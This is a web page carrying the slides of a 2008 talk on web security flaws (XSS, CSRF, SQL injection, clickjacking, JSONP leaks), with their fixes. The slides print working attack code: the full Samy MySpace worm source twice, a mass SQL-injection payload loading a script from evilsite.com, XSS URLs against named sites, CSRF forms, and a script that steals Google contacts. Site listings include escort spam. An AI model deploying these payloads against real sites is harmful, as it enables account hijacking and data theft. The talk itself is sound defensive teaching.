My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
Ā 

Recently uploaded (20)

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
Ā 
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | DelhiFULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
Ā 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
Ā 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Ā 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
Ā 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024
Ā 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Ā 
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
Ā 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Ā 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
Ā 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
Ā 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
Ā 
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
Ā 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
Ā 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
Ā 

Web Security Horror Stories

  • 1. Web Security Horror Stories The Dire ctorā€™s C ut Simon Willison, 26th October 2008
  • 2. The edited version ā€¢ On Friday, I spent 15 minutes introducing: ā€¢ XSS ā€¢ CSRF / login CSRF ā€¢ SQL injection ā€¢ Clickjacking ā€¢ I promised this talk would provide ļ¬xes
  • 3. XSS ā€¢ Cross-site scripting ā€¢ Attacker injects JavaScript code in to your site ā€¢ Amazingly common ā€¢ A single XSS hole on your domain compromises your security, entirely
  • 4. Alex Russell: If you are subject to an XSS, the same domain policy already ensures that youā€™re fā€™d. An XSS attack is the ā€œrootā€ or ā€œring 0ā€ attack of the web. http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-ļ¬lm-at-11/
  • 5. The same origin policy ā€œThe same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0.ā€ https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
  • 6. Why? ā€¢ Without the same origin policy, I could load your site in a frame, iframe or popup window from my site... ā€¢ ... and steal data from it ā€¢ ... or rewrite it with my own modiļ¬cations ā€¢ evil.hax.ru should not be able to read secret-wiki.bigco.intl ā€¢ XMLHttpRequest has the same policy
  • 7. Things I can do if you have an XSS hole ā€¢ Steal your usersā€™ cookies and log in as them ā€¢ Show a fake phishing login page on your site ā€¢ Embed malware and drive-by downloads ā€¢ Perform any action as if I was your user
  • 8. Two categories of XSS ā€¢ Reļ¬‚ected ā€¢ I embed my JS in a link to your site and trick your user in to following it ā€¢ Persistent ā€¢ I get my XSS in to your siteā€™s database somehow so that it shows up on your pages
  • 9. http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script> http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript% 20src=http://ckers.org/s%3E http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/ thread/1ab38554971acfc9')&+eval (alert(document.cookie))&+eval('?tvc=2 http://search.live.com/images/results.aspx? q=1&ļ¬rst=21&FORM=PEIRquot;><script>alert('securitylab.ru')</script> All from http://xssed.com/
  • 10.
  • 13. If youā€™re gluing SQL strings together with string appends,
  • 14. ā€¢ Wrong: ā€¢ $sql = quot;select * from users where username = 'quot; . $username . quot;'quot;; ā€¢ Right: ā€¢ $results = db_query(quot;select * from users where username = ?quot;, $username);
  • 15. Mass XSS via SQL injection DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; http://hackademix.net/2008/04/26/mass-attack-faq/
  • 16. Preventing XSS ā€¢ Use a tool that escapes everything on output ā€¢ Only unescape stuff that you know is safe and you know contains markup you want to execute ā€¢ IE 8 has an XSS ļ¬lter; this is irrelevant to developers ā€¢ httpOnly cookies are mostly a waste of time
  • 17. HTML ā€œsanitisationā€ ā€¢ My users need to be able to add links and basic styles to their submissions ā€¢ ā€œIā€™ll let them use HTML and remove anything nastyā€ ā€¢ An extremely common vector for XSS ā€¢ MySpace ā€¢ LiveJournal ā€¢ Almost anyone else who tries
  • 18. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS ['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if (J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS ['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter (AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj ();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm() {if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2 (BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open (BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
  • 19. samy is my hero http://namb.la/popular/
  • 20. A social network worm ā€¢ XSS hole in MySpaceā€™s HTML ļ¬lter ā€¢ When you viewed Samyā€™s proļ¬le... ā€¢ JS makes you add him as a friend ā€¢ JS uses XMLHttpRequest to add his exploit to YOUR proļ¬le as well
  • 21. 20 hours, 1,005,831 friend requests (then MySpace crashed)
  • 22. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS ['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if (J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS ['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter (AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj ();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm() {if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2 (BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open (BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
  • 23. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;...quot;> eval('document.body.inne' + 'rHTML'); eval('xmlhttp.onread' + 'ystatechange = callback'); http://namb.la/popular/tech.html
  • 24. Things to remember ā€¢ Whitelist, donā€™t blacklist ā€¢ Youā€™re programming against undocumented parsing routines in closed-source browsers ā€¢ Distrust any library that doesnā€™t have a unit test suite a mile long ā€¢ http://ha.ckers.org/xss.html ā€¢ http://code.google.com/p/html5lib/ is promising
  • 26. The UTF-7 hole ā€¢ Googleā€™s 404 pages used to be served without a character set speciļ¬ed in the HTTP headers or <head> section ā€¢ Without those hints, IE inspects the ļ¬rst 4096 bytes to ā€œguessā€ which encoding is used ā€¢ XSS attacks encoded as UTF-7 were shown on the page and executed by IE http://shiļ¬‚ett.org/blog/2005/dec/googles-xss-vulnerability
  • 27. You canā€™t trust CSS either ā€¢ Want to let your users include their own stylesheet? ā€¢ HTC in IE and XBL in Mozilla are both vectors for JavaScript attacks ā€¢ LiveJournal were attacked with this ā€¢ A ā€œposition: absoluteā€ hack was used to steal 30,000 MySpace passwords last year http://community.livejournal.com/lj_dev/708069.html http://www.securiteam.com/securitynews/6O00M0AHFW.html
  • 28. CSRF
  • 29. Bill Zeller: ā€œWeā€™ve found CSRF vulnerabilities in sites that have a huge incentive to do security correctly. If youā€™re in charge of a website and havenā€™t speciļ¬cally protected against CSRF, chances are youā€™re vulnerableā€
  • 30. The Google Web Accelerator
  • 31. How does it work? ā€¢ It pre-fetches the links on a page in to a cache, so theyā€™re already loaded when you click on them ā€¢ Links like http://app.example.com/ delete.php?id=5
  • 32. How does it work? ā€¢ It pre-fetches the links on a page in to a cache, so theyā€™re already loaded when you click on them ā€¢ Links like http://app.example.com/ delete.php?id=5
  • 34. Thatā€™s also a security hole <img src=quot;http://app.example.com/delete.php?id=1quot;> <img src=quot;http://app.example.com/delete.php?id=2quot;> <img src=quot;http://app.example.com/delete.php?id=3quot;> <img src=quot;http://app.example.com/delete.php?id=4quot;> <img src=quot;http://app.example.com/delete.php?id=5quot;> <img src=quot;http://app.example.com/delete.php?id=6quot;> <img src=quot;http://app.example.com/delete.php?id=7quot;> <img src=quot;http://app.example.com/delete.php?id=8quot;> ...
  • 35. So use POST ā€¢ You can't create a page that automatically posts to another site, can you?
  • 36. POST will not save you <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;> <input type=quot;submitquot; value=quot;More kittens please!quot;> </form> fofurasfelinas: http://www.ļ¬‚ickr.com/photos/fofurasfelinas/9724483/
  • 37. Or do it with JavaScript <div style=quot;display: nonequot;> <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;> </form> </div> <script>document.forms[0].submit()</script> Put this in a hidden iframe and your victim won't even know it happened.
  • 38. The Digg exploit ā€¢ A few years ago, Digg had no CSRF protection on their ā€œdigg thisā€ button ā€¢ Self-digging pages! http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
  • 39. The Gmail ļ¬lter hack http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
  • 40. ā€œWe believe this is the ļ¬rst CSRF vulnerability to allow the transfer of funds from a ļ¬nancial institution.ā€ http://www.freedom-to-tinker.com/blog/wzeller/ popular-websites-vulnerable-cross-site-request- forgery-attacks
  • 41. Preventing CSRF ā€¢ You need to distinguish between form interactions from your user on your site, and form interactions from your user on some other site ā€¢ Referrer checking is notoriously unreliable ā€¢ Solution: include a form token (Yahoo! calls this a ā€œcrumbā€) proving that the post came from your site
  • 42. Crumbs <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;37quot;> <input type=quot;hiddenquot; name=quot;crumbquot; value=quot;856c2f50ddc49fd710f14a406ec1fef652d3c9fquot;> <input type=quot;submitquot; value=quot;Delete this itemquot;> </form>
  • 43. Crumbs ā€¢ Should be unique per user (or one user can use their crumb to attack another) ā€¢ Hence should be tied to the userā€™s session or login cookie ā€¢ Should be changed over time ā€¢ Quick and dirty: use sha1(salt + userā€™s session ID + timestamp) as the crumb
  • 44. Protecting the crumb ā€¢ Your crumb is now the only thing protecting you from CSRF attacks ā€¢ This is why XSS is ā€œring 0ā€ for the Web ā€¢ With XSS, I can steal your crumb and run riot across your site ā€¢ XSS holes are automatically CSRF holes
  • 45. Crumbs and Ajax ā€¢ Ajax can set HTTP headers; regular forms canā€™t ā€¢ Ajax requests must be from the same domain ā€¢ So X-Requested-By: XMLHttpRequest can only come from your own site ā€¢ You can skip your crumb checking for requests that include that custom header
  • 46. Login CSRF ā€¢ Most login forms skip CSRF protection ā€¢ Create a throw-away PayPal account ā€¢ Use CSRF to log someone in as ā€œyouā€ ā€¢ Hope that they add their credit card or bank details ā€¢ Log in later and steal all of their money!
  • 48.
  • 49. iframe !
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
  • 55. <style type=quot;text/cssquot;> iframe { width: 400px; height: 200px; position: absolute; top: 10px; left: 10px; overflow: hidden; opacity: 0; } #decoy { ... } </style> <iframe src=quot;http://veryimportantapp.com/delete-account/quot;> </iframe> <p id=quot;decoyquot;>Click HERE for kittens!</p>
  • 56. Frame-busting <script type=quot;text/javascriptquot;> if (top.location != location) { top.location.href = document.location.href; } </script> ā€¢ Ironically, turning off JavaScript in your browser makes you less safe here
  • 57.
  • 58.
  • 60. The problem with plugins
  • 61. crossdomain.xml <cross-domain-policy> <allow-access-from domain=quot;*quot; /> </cross-domain-policy> Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs Flash can even fake an X-Requested-With: XMLHttpRequest header Thatā€™s why Flickr use api.ļ¬‚ickr.com/crossdomain.xml instead
  • 62. crossdomain.xml <cross-domain-policy> <allow-access-from domain=quot;*quot; /> </cross-domain-policy> Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs Flash can even fake an X-Requested-With: XMLHttpRequest header Thatā€™s why Flickr use api.ļ¬‚ickr.com/crossdomain.xml instead
  • 63. Nasty crossdomain.xml tricks loadPolicyFile(quot;http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xmlquot;) 00000000 47 49 46 38 39 61 01 01-01 01 e7 e9 20 3c 63 72 GIF89a.......<cr 00000010 6f 73 73 2d 64 6f 6d 61-69 6e 2d 70 6f 6c 69 63 oss-domain-polic 00000020 79 3e 0a 20 20 3c 61 6c-6c 6f 77 2d 61 63 63 65 y>...<allow-acce 00000030 73 73 2d 66 72 6f 6d 20-64 6f 6d 61 69 6e 3d 22 ss-from domain=quot; 00000040 2a 22 2f 3e 20 0a 20 20-3c 2f 63 72 6f 73 73 2d *quot;/>....</cross- 00000050 64 6f 6d 61 69 6e 2d 70-6f 6c 69 63 79 3e 47 49 domain-policy>.. http://www.hardened-php.net/library/ poking_new_holes_with_ļ¬‚ash_crossdomain_policy_ļ¬les.html
  • 64. The PDF hole ā€¢ In January 2007, an XSS hole was found in the Adobe PDF reader itself ā€¢ It could execute JavaScript in the context of the current domain ā€¢ Any sites hosting .pdf ļ¬les for download were vulnerable http://shiļ¬‚ett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
  • 65. You canā€™t secure your site 100%, because thereā€™s always a chance a browser or plugin will screw things up for you
  • 67. JSONP rocks! ā€¢ http://json-tinyurl.appspot.com/ ā€¢ http://json-time.appspot.com/ ā€¢ http://json-head.appspot.com/ http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo foo({quot;tinyurlquot;: quot;http://tinyurl.com/kotuquot;, quot;okquot;: true})
  • 68. ā€¢ JSONP lets you opt-in to sharing your siteā€™s data with other sites using JavaScript ā€¢ ... so make sure itā€™s data you want to share
  • 69. Stealing Google contacts <script> function google(a){ var emails; for(i=1;i<a.Body.Contacts.length;i){ alert(a.Body.Contacts[i].Email); } emails = quot;</ol>quot; document.write(emails); } </script> <script src=quot;http://docs.google.com/data/contacts? out=js&show=ALL&psort=Affinity&callback=google&max=99999quot;> </script> http://blog.adamjacobmuller.com/gmail.txt http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
  • 70. Jeremiah Grossman: ā€œIf any JSON feed containing user-sensitive information is wrapped with a call-back and has a predictable URL... then that data is at riskā€ http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
  • 71. Regular JSON? ā€¢ Thatā€™s not secure either ā€¢ In old versions of Firefox, you can redeļ¬ne the Array constructor to grab the data ā€¢ If your JSON object is an array, the data can be grabbed using <script src=quot;your- data-herequot;> http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
  • 72. Secure JSON Use { } as the root, not [ ] If youā€™re paranoid about future similar problems, use an idiom like this one: while (true) { {quot;jsonquot;: quot;goes herequot;} }
  • 73. And if that wasnā€™t enough ā€œMore than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.ā€ http://news.bbc.co.uk/1/hi/technology/3639679.stm ā€¢ We have a shared responsibility to teach people better online security behaviour ā€¢ Donā€™t teach our users to be phished!
  • 75. Stay informed! ā€¢ http://planet-websecurity.org/feed/ ā€¢ http://www.owasp.org/ ā€¢ http://simonwillison.net/tags/security/ ā€¢ http://simonwillison.net/tags/csrf/ ā€¢ http://simonwillison.net/tags/xss/ ā€¢ http://simonwillison.net/tags/clickjacking/ ā€¢ http://simonwillison.net/tags/phishing/